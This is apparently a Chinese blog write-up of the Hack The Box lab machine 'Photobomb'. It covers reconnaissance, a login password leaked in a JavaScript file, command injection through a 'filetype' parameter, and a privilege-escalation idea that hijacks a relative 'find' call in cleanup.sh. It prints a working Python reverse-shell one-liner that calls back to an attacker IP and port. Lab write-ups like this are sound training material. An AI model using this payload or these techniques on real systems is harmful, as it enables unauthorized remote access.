《网络安全0-100》Hack The Box [HTB] : Photobomb

一、信息收集

用nmap、dirsearch进行信息收集,发现开放22,80端口,一个矢量图标和printer目录。最开始我注意的是nginx,在网上搜索该版本漏洞后发现能使用的只有一个路径穿越漏洞/file../,且并未泄露有效信息。我们接着从80入手,将域名添加到本地hosts后进行访问。

96b89c9b887e451d8c1e0a32802c4d53.png

 二、本地JS文件中发现密码

访问printer目录,是一个登录框,尝试admin123等弱密码无果后放弃。

aa2646eddc34475fa1c6a987dbd4fdc9.png

 发现JS文件,进行访问

80732304d944478a8f95c31f6adfef7b.png

 在JS文件中发现之前扫描的printer目录,并附带有登录密码

59544943e79e4782b15de8ea4c55707f.png

 使用密码成功登录

99151297bfc5494fb34ba9077cadaa96.png

 三、命令注入,远程代码执行

使用burp抓包,发现注入点为filetype

9d06f30eecb64066a5b78ca9f8d4be16.png

 新建监听,使用python3#1playload直接反弹shell

playload:export RHOST="10.10.14.4";export RPORT=5555;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

74ec3c9be4374dcdb109d1fb7506bcb1.png

 查看当前可执行文件cleanup.sh,该文件类型为bash脚本,从文件最后一行中得出,find使用的相对路径,并非绝对路径,那我们在find文件中写入恶意代码,改变当前环境即可获取权限。

08b229bfc8ef49e5876ca5bdb589266b.png

 

  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全仔的日记

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值